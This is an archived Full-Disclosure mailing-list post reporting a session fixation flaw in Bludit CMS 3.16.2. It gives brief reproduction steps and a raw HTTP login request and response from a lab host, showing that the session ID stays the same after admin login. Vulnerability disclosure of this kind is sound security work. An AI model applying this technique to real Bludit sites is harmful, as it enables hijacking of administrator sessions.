| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAF2Wu1Z+dzrOQmprS7UXRb0h9cMML7G0RMS6A1LkVBj70qPnjQ@mail.gmail.com> Date: Sun, 6 Jul 2025 22:47:44 +0100 From: Andrey Stoykov <mwebsec@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Session Fixation - bluditv3.16.2 # Exploit Title: Session Fixation - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Session Fixation #1: Steps to Reproduce: Visit the login page. Login with valid user and observe that the sessionID has not been changed // HTTP POST request logging in POST /bludit/admin/ HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 [...] tokenCSRF=551bee4a6e6d065481ec1d29d9b37335475ae1d0&username=admin&password=password&save= // HTTP response HTTP/1.1 301 Moved Permanently Date: Tue, 03 Jun 2025 20:34:36 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: Bludit Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: /bludit/admin/dashboard Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists